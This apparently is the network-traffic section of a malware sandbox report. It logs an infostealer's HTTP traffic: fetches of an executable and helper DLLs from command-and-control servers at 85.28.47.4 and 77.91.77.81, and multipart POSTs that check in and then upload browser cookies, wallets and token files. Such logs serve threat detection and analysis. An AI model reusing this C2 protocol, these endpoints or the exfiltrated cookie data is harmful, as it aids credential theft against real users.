Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 02:13:04 GMTContent-Type: application/octet-streamContent-Length: 2514944Last-Modified: Tue, 02 Jul 2024 00:00:51 GMTConnection: keep-aliveETag: "66834333-266000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 40 66 bf 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 80 9d 00 9b 0c 00 00 bc 8c 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 90 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 30 22 00 00 50 9d 00 00 2c 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 30 36 38 32 30 43 43 35 33 33 32 36 33 32 34 32 37 36 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="hwid"8506820CC5332632427659------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build"jony------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="message"browsers------JJDGCGHCGHCBFHJJKKJE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 2d 2d 0d 0a Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="message"plugins------DBFCBGCGIJKJKECAKEGC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCGHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 2d 2d 0d 0a Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="message"fplugins------FBFHJJJDAFBKEBGDGHCG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHDHost: 85.28.47.4Content-Length: 5683Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCGHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 2d 2d 0d 0a Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12Z
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="file"------HDBGDHDAECBGDHJKFIDG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file"------GCGHJEBGHJKEBFHIJDHC--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="message"wallets------GCGHJEBGHJKEBFHIJDHC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"files------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDAHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="file"------JEGHDAFIDGDAAKEBFHDA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="message"jbdtaijovg------KFBAECBAEGDGDHIEHIJJ--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
